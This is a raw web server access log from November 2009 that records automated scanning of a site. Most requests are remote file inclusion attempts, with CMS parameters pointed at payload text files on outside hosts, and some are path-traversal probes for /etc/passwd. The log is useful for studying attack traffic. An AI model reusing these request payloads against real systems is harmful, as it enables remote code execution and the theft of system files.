63.174.244.10 - - [12/Nov/2009:00:53:09 -0600] "GET /logs/access_log.1246406400/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
63.174.244.10 - - [12/Nov/2009:00:53:09 -0600] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
63.174.244.10 - - [12/Nov/2009:00:53:09 -0600] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
63.174.244.10 - - [12/Nov/2009:00:53:10 -0600] "GET /logs/access_log.1233705600/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
221.139.3.168 - - [12/Nov/2009:00:53:18 -0600] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://come.kr/bbs/data2/images/id1(feelcomz).txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
221.139.3.168 - - [12/Nov/2009:00:53:18 -0600] "GET /logs/access_log.1253404800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://come.kr/bbs/data2/images/id1(feelcomz).txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
221.139.3.168 - - [12/Nov/2009:00:53:18 -0600] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://come.kr/bbs/data2/images/id1(feelcomz).txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:00:53:42 -0600] "GET /logs/access_log.1246406400/?DOCUMENT_ROOT=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:00:53:42 -0600] "GET /?DOCUMENT_ROOT=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:00:53:43 -0600] "GET /logs/?DOCUMENT_ROOT=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:00:53:51 -0600] "GET /logs/access_log.1253923200/?DOCUMENT_ROOT=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
82.98.136.21 - - [12/Nov/2009:00:55:55 -0600] "GET /logs/access_log.1245283200//cms/classes/openengine/filepool.php?oe_classpath=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 346 "-""Mozilla/5.0"
82.98.136.21 - - [12/Nov/2009:00:55:55 -0600] "GET //cms/classes/openengine/filepool.php?oe_classpath=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 319 "-""Mozilla/5.0"
82.98.136.21 - - [12/Nov/2009:00:55:55 -0600] "GET /logs//cms/classes/openengine/filepool.php?oe_classpath=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 324 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:00:56:55 -0600] "GET /logs/access_log.1250294400/become_editor.php?theme_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:00:56:55 -0600] "GET /become_editor.php?theme_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:00:56:55 -0600] "GET /logs/become_editor.php?theme_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:00:56:55 -0600] "GET /logs/access_log.1250899200/become_editor.php?theme_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
174.123.165.226 - - [12/Nov/2009:00:58:36 -0600] "GET /index.php?id=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""-"
174.123.165.226 - - [12/Nov/2009:00:58:36 -0600] "GET /index.php?id=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
89.171.190.107 - - [12/Nov/2009:00:59:53 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
89.171.190.107 - - [12/Nov/2009:01:00:02 -0600] "GET /?sourcedir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
89.171.190.107 - - [12/Nov/2009:01:00:03 -0600] "GET /logs/access_log.1247184000/?sourcedir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
89.171.190.107 - - [12/Nov/2009:01:00:07 -0600] "GET /logs/?sourcedir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
89.171.190.107 - - [12/Nov/2009:01:00:08 -0600] "GET /?sourcedir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
89.171.190.107 - - [12/Nov/2009:01:00:11 -0600] "GET /logs/access_log.1247184000/?sourcedir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
89.171.190.107 - - [12/Nov/2009:01:00:16 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
89.171.190.107 - - [12/Nov/2009:01:00:17 -0600] "GET /logs/?sourcedir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
89.171.190.107 - - [12/Nov/2009:01:00:41 -0600] "GET /?sourcedir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
89.171.190.107 - - [12/Nov/2009:01:00:41 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
89.171.190.107 - - [12/Nov/2009:01:00:41 -0600] "GET /logs/access_log.1247184000/?sourcedir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
89.171.190.107 - - [12/Nov/2009:01:00:48 -0600] "GET /logs/?sourcedir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
65.55.109.135 - - [12/Nov/2009:01:01:14 -0600] "GET /logs/access_log.1243209600 HTTP/1.1" 200 752968 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30707; InfoPath.2)"
124.217.226.100 - - [12/Nov/2009:01:01:39 -0600] "GET /logs/access_log.1245283200//cms/classes/openengine/filepool.php?oe_classpath=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
124.217.226.100 - - [12/Nov/2009:01:01:39 -0600] "GET /logs//cms/classes/openengine/filepool.php?oe_classpath=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
124.217.226.100 - - [12/Nov/2009:01:01:39 -0600] "GET //cms/classes/openengine/filepool.php?oe_classpath=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
89.171.190.107 - - [12/Nov/2009:01:01:52 -0600] "GET /logs/access_log.1247184000/?sourcedir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
89.171.190.107 - - [12/Nov/2009:01:01:57 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
89.171.190.107 - - [12/Nov/2009:01:02:06 -0600] "GET /logs/?sourcedir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:01:04:51 -0600] "GET /logs/access_log.1234828800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:01:04:51 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:01:04:51 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
65.55.106.227 - - [12/Nov/2009:01:04:55 -0600] "GET /logs/access_log.1227398400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.217.226.100 - - [12/Nov/2009:01:05:19 -0600] "GET //cms/classes/openengine/filepool.php?oe_classpath=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
124.217.226.100 - - [12/Nov/2009:01:05:19 -0600] "GET /logs//cms/classes/openengine/filepool.php?oe_classpath=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
124.217.226.100 - - [12/Nov/2009:01:05:19 -0600] "GET /logs/access_log.1245283200//cms/classes/openengine/filepool.php?oe_classpath=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
204.232.149.234 - - [12/Nov/2009:01:05:59 -0600] "GET //cms/classes/openengine/filepool.php?oe_classpath=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
204.232.149.234 - - [12/Nov/2009:01:05:59 -0600] "GET /logs/access_log.1245283200//cms/classes/openengine/filepool.php?oe_classpath=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
204.232.149.234 - - [12/Nov/2009:01:06:00 -0600] "GET /logs//cms/classes/openengine/filepool.php?oe_classpath=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
204.232.149.234 - - [12/Nov/2009:01:06:17 -0600] "GET //cms/classes/openengine/filepool.php?oe_classpath=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
204.232.149.234 - - [12/Nov/2009:01:06:18 -0600] "GET /logs//cms/classes/openengine/filepool.php?oe_classpath=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
204.232.149.234 - - [12/Nov/2009:01:06:18 -0600] "GET /logs/access_log.1245283200//cms/classes/openengine/filepool.php?oe_classpath=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
117.58.251.130 - - [12/Nov/2009:01:06:33 -0600] "GET /index.php?doc=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""-"
117.58.251.130 - - [12/Nov/2009:01:06:33 -0600] "GET /logs/index.php?doc=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""-"
117.58.251.130 - - [12/Nov/2009:01:06:33 -0600] "GET /index.php?doc=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
117.58.251.130 - - [12/Nov/2009:01:06:33 -0600] "GET /logs/index.php?doc=./../../../../../../../../etc/passwd HTTP/1.1" 404 297 "-""-"
211.189.39.159 - - [12/Nov/2009:01:10:34 -0600] "GET /logs/access_log.1230422400//include/write.php?dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.189.39.159 - - [12/Nov/2009:01:10:34 -0600] "GET /logs//include/write.php?dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.189.39.159 - - [12/Nov/2009:01:10:34 -0600] "GET //include/write.php?dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.189.39.159 - - [12/Nov/2009:01:12:58 -0600] "GET //include/write.php?dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.189.39.159 - - [12/Nov/2009:01:12:58 -0600] "GET /logs/access_log.1228608000//include/write.php?dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.189.39.159 - - [12/Nov/2009:01:13:01 -0600] "GET /logs//include/write.php?dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
69.72.144.34 - - [12/Nov/2009:01:13:25 -0600] "GET /index.php?nic=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""-"
65.55.107.182 - - [12/Nov/2009:01:13:26 -0600] "GET /logs/access_log.1162512000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.72.144.34 - - [12/Nov/2009:01:13:29 -0600] "GET /index.php?nic=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
65.55.106.209 - - [12/Nov/2009:01:13:55 -0600] "GET /logs/access_log.1189728000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.163.197.88 - - [12/Nov/2009:01:14:26 -0600] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:01:14:26 -0600] "GET /logs/access_log.1246492800/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:01:14:26 -0600] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:01:14:34 -0600] "GET /logs/access_log.1247270400/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
140.113.223.66 - - [12/Nov/2009:01:14:35 -0600] "GET /logs/access_log.1245283200//cms/classes/openengine/filepool.php?oe_classpath=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 346 "-""Mozilla/5.0"
140.113.223.66 - - [12/Nov/2009:01:14:35 -0600] "GET /logs//cms/classes/openengine/filepool.php?oe_classpath=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 324 "-""Mozilla/5.0"
140.113.223.66 - - [12/Nov/2009:01:14:35 -0600] "GET //cms/classes/openengine/filepool.php?oe_classpath=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 319 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:01:14:36 -0600] "GET /logs//com_simpleboard/file_upload.php?sbp=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:01:14:36 -0600] "GET //com_simpleboard/file_upload.php?sbp=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:01:14:36 -0600] "GET /logs/access_log.1245715200//com_simpleboard/file_upload.php?sbp=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
69.72.144.34 - - [12/Nov/2009:01:15:44 -0600] "GET /?cmd&file=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3245 "-""-"
69.72.144.34 - - [12/Nov/2009:01:15:46 -0600] "GET /?cmd&file=./../../../../../../../../etc/passwd HTTP/1.1" 200 3245 "-""-"
66.163.197.88 - - [12/Nov/2009:01:16:16 -0600] "GET /logs/sphider/search.php?include_dir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:01:16:16 -0600] "GET /sphider/search.php?include_dir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:01:16:21 -0600] "GET /logs/access_log.1243296000/sphider/search.php?include_dir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:01:16:22 -0600] "GET /logs/access_log.1243641600/sphider/search.php?include_dir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:01:16:55 -0600] "GET /logs/access_log.1241568000//com_simpleboard/file_upload.php?sbp=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
213.79.101.98 - - [12/Nov/2009:01:18:58 -0600] "GET /logs/access_log.1238112000//include/config.inc.php?lvc_include_dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
213.79.101.98 - - [12/Nov/2009:01:18:58 -0600] "GET /logs//include/config.inc.php?lvc_include_dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
213.79.101.98 - - [12/Nov/2009:01:18:58 -0600] "GET //include/config.inc.php?lvc_include_dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
213.79.101.98 - - [12/Nov/2009:01:18:58 -0600] "GET /logs/access_log.1248998400//include/config.inc.php?lvc_include_dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
65.55.106.133 - - [12/Nov/2009:01:19:54 -0600] "GET /logs/access_log.1228694400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.51.180.86 - - [12/Nov/2009:01:20:19 -0600] "GET /logs//common/db.php?commonpath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
210.51.180.86 - - [12/Nov/2009:01:20:19 -0600] "GET /logs/access_log.1249344000//common/db.php?commonpath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
210.51.180.86 - - [12/Nov/2009:01:20:19 -0600] "GET //common/db.php?commonpath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
210.51.180.86 - - [12/Nov/2009:01:20:34 -0600] "GET /logs/access_log.1249948800//common/db.php?commonpath=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
212.108.197.244 - - [12/Nov/2009:01:21:41 -0600] "GET /xmlrpc.php HTTP/1.1" 404 293 "-""-"
213.79.101.98 - - [12/Nov/2009:01:22:53 -0600] "GET /logs/access_log.1249516800//include/config.inc.php?lvc_include_dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
213.79.101.98 - - [12/Nov/2009:01:22:53 -0600] "GET /logs/access_log.1249776000//include/config.inc.php?lvc_include_dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
69.72.144.34 - - [12/Nov/2009:01:23:17 -0600] "GET /logs/?cmd&file=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 212466 "-""-"
69.72.144.34 - - [12/Nov/2009:01:23:22 -0600] "GET /logs/?cmd&file=./../../../../../../../../etc/passwd HTTP/1.1" 200 212466 "-""-"
65.55.207.117 - - [12/Nov/2009:01:24:55 -0600] "GET /logs/access_log.1188000000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.247.200.12 - - [12/Nov/2009:01:25:35 -0600] "GET /logs/access_log.1248912000//bemarket/postscript/postscript.php?p_mode=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
124.247.200.12 - - [12/Nov/2009:01:25:35 -0600] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.247.200.12 - - [12/Nov/2009:01:25:35 -0600] "GET //bemarket/postscript/postscript.php?p_mode=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
124.247.200.12 - - [12/Nov/2009:01:26:30 -0600] "GET /logs/access_log.1247184000//bemarket/postscript/postscript.php?p_mode=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:26:38 -0600] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:26:38 -0600] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:26:38 -0600] "GET /logs/access_log.1230163200//bookmark4u/lostpasswd.php?env[include_prefix]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:26:48 -0600] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env[include_prefix]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.207.21 - - [12/Nov/2009:01:27:25 -0600] "GET /logs/access_log.1190851200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.55.165.80 - - [12/Nov/2009:01:29:30 -0600] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://95.70.104.73/id.txt???? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
72.55.165.80 - - [12/Nov/2009:01:29:30 -0600] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://95.70.104.73/id.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
212.108.197.244 - - [12/Nov/2009:01:30:25 -0600] "GET /logs/xmlrpc.php HTTP/1.1" 404 298 "-""-"
65.55.207.120 - - [12/Nov/2009:01:31:55 -0600] "GET /logs/access_log.1204675200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.109.68 - - [12/Nov/2009:01:33:42 -0600] "GET /logs/access_log.1209340800 HTTP/1.1" 200 1628 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
65.55.109.70 - - [12/Nov/2009:01:36:33 -0600] "GET /logs/access_log.1163980800 HTTP/1.1" 200 1130 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
211.47.69.100 - - [12/Nov/2009:01:36:44 -0600] "GET /logs/access_log.1241395200//sloadenv.inc.php?DOCUMENT_ROOT=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.47.69.100 - - [12/Nov/2009:01:36:44 -0600] "GET //sloadenv.inc.php?DOCUMENT_ROOT=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.47.69.100 - - [12/Nov/2009:01:36:44 -0600] "GET /logs//sloadenv.inc.php?DOCUMENT_ROOT=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.47.69.100 - - [12/Nov/2009:01:38:06 -0600] "GET /logs/access_log.1233619200//sloadenv.inc.php?DOCUMENT_ROOT=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
72.55.165.80 - - [12/Nov/2009:01:38:19 -0600] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://95.70.104.73/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
72.55.165.80 - - [12/Nov/2009:01:38:19 -0600] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://95.70.104.73/id.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
82.98.136.21 - - [12/Nov/2009:01:42:35 -0600] "GET /logs/access_log.1250294400//skin/sirini_ezset/ask_password.php?dir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 345 "-""Mozilla/5.0"
82.98.136.21 - - [12/Nov/2009:01:42:35 -0600] "GET //skin/sirini_ezset/ask_password.php?dir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 318 "-""Mozilla/5.0"
82.98.136.21 - - [12/Nov/2009:01:42:35 -0600] "GET /logs//skin/sirini_ezset/ask_password.php?dir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 323 "-""Mozilla/5.0"
82.98.136.21 - - [12/Nov/2009:01:42:44 -0600] "GET /logs/access_log.1253577600//skin/sirini_ezset/ask_password.php?dir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 345 "-""Mozilla/5.0"
65.55.110.75 - - [12/Nov/2009:01:45:25 -0600] "GET /logs/access_log.1168992000 HTTP/1.1" 200 29153 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
209.92.156.53 - - [12/Nov/2009:01:48:32 -0600] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:48:32 -0600] "GET /logs/access_log.1249689600//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:48:32 -0600] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 200 212471 "-""Mozilla/5.0"
91.121.28.22 - - [12/Nov/2009:01:49:30 -0600] "GET /logs/access_log.1248912000//bemarket/postscript/postscript.php?p_mode=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
91.121.28.22 - - [12/Nov/2009:01:49:30 -0600] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
91.121.28.22 - - [12/Nov/2009:01:49:30 -0600] "GET //bemarket/postscript/postscript.php?p_mode=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.121.28.22 - - [12/Nov/2009:01:49:37 -0600] "GET /logs/access_log.1247184000//bemarket/postscript/postscript.php?p_mode=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
91.137.0.63 - - [12/Nov/2009:01:50:25 -0600] "GET /errors.php?error=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 293 "-""-"
81.17.90.13 - - [12/Nov/2009:01:51:39 -0600] "GET /logs/mygallerybrowser.php?myPath=http://202.111.158.169/id2?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
81.17.90.13 - - [12/Nov/2009:01:51:39 -0600] "GET /mygallerybrowser.php?myPath=http://202.111.158.169/id2?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
72.55.165.80 - - [12/Nov/2009:01:52:26 -0600] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://95.70.104.73/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
72.55.165.80 - - [12/Nov/2009:01:52:26 -0600] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://95.70.104.73/id.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
